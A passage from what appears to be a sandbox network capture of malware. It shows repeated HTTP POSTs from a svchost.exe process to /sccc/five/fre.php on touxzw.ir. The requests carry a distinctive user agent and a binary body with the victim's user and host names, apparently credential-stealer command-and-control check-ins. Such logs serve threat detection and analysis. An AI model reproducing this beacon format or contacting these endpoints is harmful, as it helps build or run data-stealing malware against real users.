Feb 25, 2025 05:24:55.751903057 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:56.369088888 CET	850	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:24:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ezJPrR3bJcogINf%2FbW8XE%2B60R%2B1BaTltvxI%2B2f8C0vEd0sqN%2FSg5o2KP3H8M%2BHuQKQl05XLTVmwEOVGtCcvuH%2FBzOibbOCR7ROjVgLp6PTVgWJsVnZGczIYduo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174edb6f83a43a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1621&rtt_var=810&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49964	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:57.557872057 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:57.564038992 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:58.310960054 CET	848	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:24:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uVvlpE7pu5y7NVZX%2BRjNcNGf31pARJq5outAWqMbtHbar%2BN1WIh1pCt0Ku0rHovo113SzvnLFSmNHdFgTX6zW1Egm%2ByTF09H%2BMci%2BLaJ2qu6SZaB%2BMzRrpbmWFM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174edc23b8a43e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1566&rtt_var=783&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49976	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:59.492676973 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:59.497837067 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:00.252089024 CET	847	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:25:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A715y%2BCPOZCpBTQEFOjMIrTg0hpFwgRIRKCgbJt1LWCd0FEkOXe82zOgEZ4IuNkzQTaonc4U%2Fe6BBem8%2FTCeW56cRceJwWxQiTdUskbX%2Bi0oFlF%2Bwk9c6dJPL0Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174edce596d41cd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2732&min_rtt=2732&rtt_var=1366&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49992	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:01.405045033 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:01.410147905 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:02.133009911 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:25:02 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KJxErx9VEss0ReXdvECS%2Fh7zCnlhWMj%2BkQe89E%2BXzgtdEd5fmdAaTQxjs2PKyvbVoKcQ1PECaBvuSgy258SBjbYffrSVoPs2SO8O6VghyDCziX4iXrQVszXth%2Fg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174edda4c6e43b8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1563&rtt_var=781&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50004	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:03.310174942 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:03.315326929 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:04.109627962 CET	842	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:25:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=19YG3QDT83WAbT3ilEM4uKnfkimjxYYk28mi6GF5iy6EyuW4oC6JS9hXK0%2Fyh45SrzZ9E%2BM49A2mWz1llWP7KJGEcIj7PertUoKxx1Tuu9VH%2FMC4G4h7znig7l4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ede63b95729f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1951&min_rtt=1951&rtt_var=975&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50007	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:05.310194016 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:05.320339918 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:06.065833092 CET	843	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:25:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OMxjN8CVCa7ybSv9ujZKapdxr7TyyrgX3GJRZf5swc9pZywiG4oAgMKeoBdcRT8e8usY7O%2F6ReE8mxIantDLpkmTKpra3CEevQ7Ctq%2Brf8reVp8hC%2BWSXaLPUu8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174edf2a8434325-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2329&min_rtt=2329&rtt_var=1164&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50008	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:07.212063074 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:07.217221975 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:07.965418100 CET	846	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:25:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SBjMJr9SGjGoEH5guL7uePzixJ3%2FDvRw8QfR1O%2BlsC%2FLYZiV2At4vA45iP09GW%2Fk6U23oNRlb5NDb3jo9%2B4Rshl6PAEicYqxP1MqUyeUNkNE9lOYWz9BU3ii9j0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174edfe9e444385-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1572&rtt_var=786&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50009	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:09.121912956 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:09.128532887 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:09.876976967 CET	828	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:25:09 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VyW8O85gENUelQ%2BO61Tdv1BXij1OQJlpLOIN%2FGpD1rjDIStXeEtX%2F4%2BDRYA5%2FoP9nt4vw23lS4EJ7NTGITuWmObE9EOIr4612JNG%2BvjATSBLiPio7KoUh%2F4qEjU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ee0acdd6c3ff-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1612&rtt_var=806&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50010	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:11.025738001 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:11.030905008 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:11.823061943 CET	836	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:25:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ADdYTlWrZuUI56kqVx3vuegSnIMx4cilqU6LVnWJdva7tYUiEDrSjsOpIr9kcriDGxuGL8N8PdqxrFw6010gdxQE0NVGIw8IIqnwMC9vytllxYBsaDEp849Tpo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ee166ddf42e6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1722&min_rtt=1722&rtt_var=861&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50011	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:12.994770050 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:12.999938965 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:13.772494078 CET	852	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:25:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j%2B48idDGTijysnxo88xGnq%2BdUgDPFGzqseUc51IrWXgbjhDT%2FIngF%2BA5aiKxaH4U7xQoHIvNPDWbsgqSMIEd%2F%2F96LlhXkWAZb8%2Fgw3Vh7O5PdeirF%2F6EnzmNrwo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ee22bca58c93-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1954&min_rtt=1954&rtt_var=977&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50012	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:14.938050032 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:14.943217993 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:15.688381910 CET	845	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:25:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pKuL693vHD%2BFf1ERMqGduDReemGxZNHCAsz9eUELQkKv%2BaJjr1v5FAlhCg0u0b1f8wZkjVH3BTnJGI%2B56P2sNd4m5WEDOSGmym1XMJSyYdjajQqZhG%2FawHueW3g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ee2ed94c7c9c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2059&min_rtt=2059&rtt_var=1029&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50013	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:16.836450100 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:16.841564894 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:17.605642080 CET	842	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:25:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NbS8kZS6jUjwDGjOZEGFe2KD3rpt08dm0KcuhDNP27577AX%2B9DdhfFGzLj4HB1GzRqK3mwIRo1IsCzzg7n5bKrYypkQSxB%2FcjGCPEumDtbzCG%2FzAKnXrL3z15cw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ee3acfb04370-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1571&rtt_var=785&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50014	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:18.779872894 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:18.785841942 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:19.405771971 CET	846	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:25:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CKGaVSN%2FsdoK6WRlBcfJ6G1JGQJkXsmxrQm07HmmhMgYj8Gw%2Fh9xwjSSzzKuXnjO7kVjfGGu5MMJEIpDbfUGYM6BeUGjohUTERqyUshmb%2BCd55EYg%2Bkre%2FNvdyk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ee46ef1542a7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1624&rtt_var=812&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	50015	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:20.576951981 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:20.582159996 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
